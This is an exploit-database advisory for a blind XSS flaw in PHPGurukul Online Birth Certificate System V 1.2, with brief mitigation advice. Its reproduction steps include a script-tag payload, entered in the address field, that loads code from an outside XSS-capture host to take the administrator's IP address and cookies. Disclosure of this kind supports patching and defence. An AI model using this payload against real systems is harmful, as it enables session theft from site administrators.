header-logo
Suggest Exploit
vendor:
Online Birth Certificate System
by:
Prasheek Kamble
8.8
CVSS
HIGH
Blind XSS
79
CWE
Product Name: Online Birth Certificate System
Affected Version From: V 1.2
Affected Version To: V 1.2
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:online_birth_certificate_system
Metasploit:
Other Scripts:
Platforms Tested: MAC OS, XAMPP
2022

PHPGurukul Online Birth Certificate System V 1.2 – Blind XSS

PHPGurukul Online Birth Certificate System V 1.2 is vulnerable to Blind XSS. An attacker can exploit this vulnerability by navigating to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php, filling the form and entering an XSS payload in the address field. When the admin clicks on the request to verify the form, the XSS payload gets fired and the attacker can get the details of the victim like IP address, cookies, etc.

Mitigation:

Input validation should be done to prevent XSS attacks. Sanitize user input and encode output to prevent XSS attacks.
Source

Exploit-DB raw data:

Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP



Steps to reproduce:

1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php 
2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
3) Click on Add Details and intercept the request in Burpsuite
4) After this, the details have been submitted.
5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
7) So attacker is sucessful in getting the victim's ip address and other details.

#POC's

https://ibb.co/kSxFp2g 
https://ibb.co/VvSVRsy  
https://ibb.co/mSGp4FX 
https://ibb.co/hXbJ9TZ 
https://ibb.co/M6vS08S

Navigation

Suggest Exploit

Services By CQR